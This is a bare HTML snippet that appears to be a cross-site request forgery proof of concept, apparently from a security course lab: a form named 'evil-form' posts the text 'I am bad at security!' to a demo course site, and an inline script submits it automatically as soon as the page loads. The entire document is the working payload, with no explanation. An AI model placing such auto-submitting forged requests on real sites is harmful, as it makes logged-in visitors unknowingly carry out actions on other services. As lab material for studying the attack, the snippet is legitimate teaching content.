<form id="evil-form" action="https://demo.csci3403.com" method="POST">
<input type="text" name="content" value="I am bad at security!">
</form>

<script>
document.getElementById("evil-form").submit()
</script>
